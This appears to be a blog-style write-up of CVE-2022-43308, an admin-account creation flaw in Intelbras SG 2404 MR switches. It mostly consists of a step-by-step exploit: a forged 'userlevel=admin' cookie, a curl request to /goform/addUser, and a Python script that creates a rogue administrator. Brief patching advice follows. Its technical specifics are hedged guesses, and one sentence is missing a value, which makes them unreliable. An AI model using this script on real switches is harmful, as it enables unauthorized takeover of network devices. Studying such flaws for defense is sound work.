CVE-2022-43308 - How Attackers Can Create Admin Accounts on Intelbras SG 2404 MR Switches

In late 2022, a serious vulnerability was discovered in the INTELBRAS SG 2404 MR managed network switch, specifically in firmware version 20180928-rel64938. This vulnerability, tracked as CVE-2022-43308, allows authenticated attackers to create new administrator accounts simply by manipulating browser cookies.

In this article, we'll break down how this vulnerability works with easy-to-follow steps, code examples, and links to more resources. Whether you're a security professional or an interested user, this guide will help you understand and protect against this weakness.

What is CVE-2022-43308?

CVE-2022-43308 is a vulnerability that exists in the web management interface of the Intelbras SG 2404 MR network switch. With basic access (even just as an ordinary user), a hacker can abuse the way the system uses cookies for authentication, and secretly create new administrator accounts on the device.

Why is this Dangerous?

- Escalation of Privileges: Anyone with even limited access can promote themselves to administrator.
- Full Control: An attacker with administrator access can change network settings, disable security, or create backdoors.
- No Special Tools Needed: Simple browser tools and basic scripting can be used to exploit this flaw.

1. Cookie-based Authentication

After logging in, the web interface uses cookies to track logged-in users. The contents of these cookies are not well protected. The server trusts any information it finds in these cookies and does not sufficiently check their values.

2. Crafting a Malicious Cookie

If you change certain values in the cookie to mimic an admin session, the next request you make can trick the server into thinking you are an administrator.

3. Using the Web API to Create an Admin

Once the system thinks you're an admin, you can use the web interface or direct API calls to create new admin accounts.

Step-by-Step Exploit Details

> Warning: Do not attempt this on devices or networks you do not own or have explicit permission to test.

Step 1: Log in as a Regular User

Visit the web management page and log in using any regular user credentials.

Step 2: Inspect and Edit Cookies

Open your browser's developer tools (press F12).

Go to the Application (Chrome) or Storage (Firefox) tab, and look for cookies set by the switch, such as username, userlevel, etc.

Step 3: Change User Level

Find the cookie that tracks the user's permissions—often userlevel or similar. Change the value from a regular user (user, or numeric values like 1) to admin (usually admin, administrator, or numeric values like ).

Example

// In browser developer console or using an extension like "EditThisCookie", edit:
document.cookie = "userlevel=admin"; // (adapt the cookie name and value as needed)

Step 4: Forge API Request to Add Administrator

With the cookie altered, navigate to the "User Management" page, or send a direct POST request to the user creation endpoint.

Example using curl

curl -b "userlevel=admin; sessionid=..." \
     -X POST \
     -d "username=eviladmin&password=EvilPass123&level=admin" \
     http://<SWITCH_IP>/goform/addUser

Replace <SWITCH_IP> and parameter names with those relevant to your device.

Step 5: Log in as the New Administrator User

Log out, then log in again using the freshly created admin account. You now have full control over the device.

Here’s a minimal Python script using requests to automate the exploit

import requests

switch_url = "http://192.168.1.1";  # Change to your switch's IP
login_data = {'username': 'user', 'password': 'userpass'}  # Replace with low-priv creds

# Start a session
session = requests.Session()
session.post(f"{switch_url}/login", data=login_data)

# Set our admin cookie
session.cookies.set('userlevel', 'admin')  # Adjust cookie name as needed

# Create new admin user
payload = {
    'username': 'hacker',
    'password': 'StrongPass!2023',
    'level': 'admin'
}
r = session.post(f"{switch_url}/goform/addUser", data=payload)
print(r.text)

Responsible Disclosure & Fixes

Intelbras was notified, but as of June 2024, some publicly shipped devices with firmware 20180928-rel64938 remain unpatched.

Use strong, unique passwords.

- Regularly check Intelbras' official website for firmware updates.

Original References

- CVE-2022-43308 at NVD (National Vulnerability Database)
- VulDB Entry
- Full Disclosure Mailing List Post *(if available)*

Conclusion

CVE-2022-43308 demonstrates how poor cookie handling can give attackers full network control. If you use an Intelbras SG 2404 MR, update your firmware or restrict access. For administrators everywhere, regularly audit your devices for similar misconfigurations.

Stay safe, test responsibly, and always keep your devices updated!

Timeline

Published on: 11/18/2022 04:15:00 UTC
Last modified on: 11/23/2022 18:07:00 UTC